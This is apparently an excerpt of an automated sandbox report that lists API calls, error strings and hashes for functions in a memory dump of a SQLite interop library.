                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 372259789-0
                                                                                                                                                                                                                                      • Opcode ID: b34c42173c138a5258b48ac5ae8de4106cb482b29b3dc2c6f25c2b7aeacc24a6
                                                                                                                                                                                                                                      • Instruction ID: 9cdeb6eeb6b3e44d557c5a0042aca00accf197b2802e217f1513766219bd12b5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b34c42173c138a5258b48ac5ae8de4106cb482b29b3dc2c6f25c2b7aeacc24a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1B1A174724601EBEB05DF78D4C27E7F3A4BB49318F400255DA2997208FB3AAA55CB92
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1f5d3f8071028d3df20fb02caeaba33d0455b4058431aeedad8a39113d3a5486
                                                                                                                                                                                                                                      • Instruction ID: 5c8932c16f98aefb0f61988b39fd15aae0d44589ba9016cff94505e2c60be56e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f5d3f8071028d3df20fb02caeaba33d0455b4058431aeedad8a39113d3a5486
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09A14974628B05CBCB25DF79C4806EBB3E1BF49308F100959D46AA7314FB3AAA45DF52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC4B592
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC4B706
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC4B850
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC4B965
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$Iffb8076c269e2a85._memset
                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                      • API String ID: 2441030279-3887548279
                                                                                                                                                                                                                                      • Opcode ID: 5d0d20219b70adbc57dae109644ca87227361624c25eadfaa2bb812f9091f8fb
                                                                                                                                                                                                                                      • Instruction ID: 5fb132953d6a7bc7c30c9732faeef3f03cccdca662df02c0726dc94f6e4087a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d0d20219b70adbc57dae109644ca87227361624c25eadfaa2bb812f9091f8fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFE18E70A257019FD714CF29C48079AB7F0FF88308F144AA9D8A98B651F739EB95CB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC6B8F8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6B965
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC6B960
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6B94A, 6BC6B956
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 372259789-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 5ea3b8563fe38db893c4d1da903aba0b28402866f1d290b50d9ceb05a43a9b81
                                                                                                                                                                                                                                      • Instruction ID: 7d2a9068e160cc8a099e548b88b6296a4b32b60162686f44fce1163a7e65fe31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ea3b8563fe38db893c4d1da903aba0b28402866f1d290b50d9ceb05a43a9b81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39D12371A142159BDB10CF68C8C2A6AB7B0FF49398F0441A9F959CB342F738EA51C7E1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 6BC2CA3A
                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 6BC2CCA6
                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6BC2CA63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                      • API String ID: 2102423945-272990098
                                                                                                                                                                                                                                      • Opcode ID: 2e0eea4aa982c9b30d00dcdd1366bec3301a28c7ce8e1be8836996570c859e79
                                                                                                                                                                                                                                      • Instruction ID: 78a17331fb7cf2ff8c0e29242f62b2948ede76c960f6c7eb9f8bbbf8f760dfbb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e0eea4aa982c9b30d00dcdd1366bec3301a28c7ce8e1be8836996570c859e79
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABE1AE75E15205DFDB14CF68C480AAFBBB5FF49304F1485A9D859AB301E738EA45CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC4AC90
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC4ACAC
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC4ACBB
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC4AD35
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I5b914c29cf5a7984.$I8b0d9e6837e61abc.Iffb8076c269e2a85.
                                                                                                                                                                                                                                      • String ID: string or blob too big
                                                                                                                                                                                                                                      • API String ID: 2728433035-2803948771
                                                                                                                                                                                                                                      • Opcode ID: b117a055ccca042187a560fa959a51e297ca112217670f664651deddc5c6fc9b
                                                                                                                                                                                                                                      • Instruction ID: de271ff0a6cb2053ad4acf9f29a886660c9b439236688c45f211c7bc6346c851
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b117a055ccca042187a560fa959a51e297ca112217670f664651deddc5c6fc9b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEA1D572929B514BE715CF68884025AB7A1AFC6329F180BBDF8B4873D0F739C7458752
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 6BBD81BF
                                                                                                                                                                                                                                        • Part of subcall function 6BBD641B: __getptd_noexit.LIBCMT ref: 6BBD641E
                                                                                                                                                                                                                                        • Part of subcall function 6BBD641B: __amsg_exit.LIBCMT ref: 6BBD642B
                                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 6BBD81DF
                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 6BBD81EF
                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 6BBD820C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 6BBD821F
                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(05671668), ref: 6BBD8237
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                                                                                      • Opcode ID: b9de3b5c901d95867417e2631b5ae5d66cbf19dc1e8e2e092e0546693e90a041
                                                                                                                                                                                                                                      • Instruction ID: 9d252b5991e29617d23df7dec70e70893ffe1b65932c68bfd52ab55a7b035da8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9de3b5c901d95867417e2631b5ae5d66cbf19dc1e8e2e092e0546693e90a041
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB018032904EA1DBEB419B39980675DB7B0EF0A769F015149E810AB280CB3CA942CFE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A4DE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,?,?,6BC6103B,00000012,6BCFF004,?,6BCC5752), ref: 6BC5D0BA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5D0B3
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5D0A4
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5D0AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: a51d2936a76a22a58464aa770ebefebed317acfd32e8620ca8d7905c74ac48c9
                                                                                                                                                                                                                                      • Instruction ID: f85ea2da228145a123815be8d124838e931d2cdfcaa90daad9b1d819290c9b35
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51d2936a76a22a58464aa770ebefebed317acfd32e8620ca8d7905c74ac48c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E8162377491094BEB00DE5DBC8259DF791F78A23AB9442BBEE0CDB700E536C9258B91
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d$json_object() labels must be TEXT$json_object() requires an even number of arguments${
                                                                                                                                                                                                                                      • API String ID: 0-256717443
                                                                                                                                                                                                                                      • Opcode ID: ada3408273d77e6ed2e22401c42fbf5d280d058e7b678b1b9d8572666bfe652f
                                                                                                                                                                                                                                      • Instruction ID: 87f46cf52cee6201f57b846918995123b66dc5ad531ed80cfeaf3ab261a21453
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ada3408273d77e6ed2e22401c42fbf5d280d058e7b678b1b9d8572666bfe652f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90819E716583408FD300EF28C491B5BB7E1BB85368F444A9DF8999B291E738EB45CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011ADC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,?,?,?,?,6BC8AEB6), ref: 6BC858E6
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011AC1,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,00000000,?,00000000,?,?,?,?,6BC8AEB6), ref: 6BC859CA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 4544370086385b5e467f112dfcb0f1ef7ed47b666ce25c5fdbea827f204229b3
                                                                                                                                                                                                                                      • Instruction ID: 9746525236e325c020f51b485b114e14cd4a300792127feb6ca7edc8763c8666
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4544370086385b5e467f112dfcb0f1ef7ed47b666ce25c5fdbea827f204229b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A71D774F11115AFDB00CF68D881A9ABBB5FF48318F1080A9D91ADB341E775EA52CBE1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 0-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 18da2738b8620503a00d9abedce2078214c2cd7b0d4279bbaa1131b37a283339
                                                                                                                                                                                                                                      • Instruction ID: 7a8471c2925adc8b3bdda3185af568c5985d1c09873e1bce8ec40ae2e0c52e0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18da2738b8620503a00d9abedce2078214c2cd7b0d4279bbaa1131b37a283339
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D671A472E146559BDB04CF69C8806AEBBB0FF41314F0481A9E864AB245F738DB74CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC47EFB
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC47F33
                                                                                                                                                                                                                                      • SI905dcc543d48caab.SQLITE.INTEROP(?,SHA3 size should be one of: 224 256 384 512,000000FF), ref: 6BC47F69
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(?,?,?), ref: 6BC47FA3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SHA3 size should be one of: 224 256 384 512, xrefs: 6BC47F63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I5b914c29cf5a7984.I905dcc543d48caab.Iffb8076c269e2a85._memset
                                                                                                                                                                                                                                      • String ID: SHA3 size should be one of: 224 256 384 512
                                                                                                                                                                                                                                      • API String ID: 800791286-3613959757
                                                                                                                                                                                                                                      • Opcode ID: 818b1a1dddf26f2852a59ca8865849b07f80bcf670193665861c71e4267b3a98
                                                                                                                                                                                                                                      • Instruction ID: 8a974ebb26d4642a63e6e4ba3ad95208aa113aa5bf6b1b93c22504e701de712a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 818b1a1dddf26f2852a59ca8865849b07f80bcf670193665861c71e4267b3a98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E5104B2A253018FE310CF28C941A5BB3E5EBC5314F144A6AE89587281F739EB48D792
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3E050
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3E0B2
                                                                                                                                                                                                                                      • __localtime64_s.LIBCMT ref: 6BC3E0F5
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6BC3E171
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
